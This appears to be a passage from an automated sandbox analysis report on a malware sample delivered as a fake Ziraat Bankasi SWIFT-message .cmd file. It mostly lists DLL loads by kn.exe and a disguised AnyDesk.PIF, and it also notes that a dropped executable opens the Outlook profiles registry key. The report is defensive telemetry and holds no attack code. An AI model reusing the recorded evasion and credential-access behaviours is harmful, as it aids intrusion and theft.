                    Source: C:\Windows\System32\extrac32.exe, Section loaded: cabinet.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: textinputframework.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: coreuicomponents.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: coremessaging.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: wintypes.dll
                    Source: C:\Windows\System32\extrac32.exe, Section loaded: textshaping.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: certcli.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: cabinet.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: cryptui.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: ncrypt.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: netapi32.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: ntdsapi.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: version.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: secur32.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: certca.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: cryptsp.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: samcli.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: logoncli.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: dsrole.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: netutils.dll
                    Source: C:\Users\Public\kn.exe, Section loaded: sspicli.dll
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: version.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: url.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: ??????p.dll
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdStatic file information: File size 3381962 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdb source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
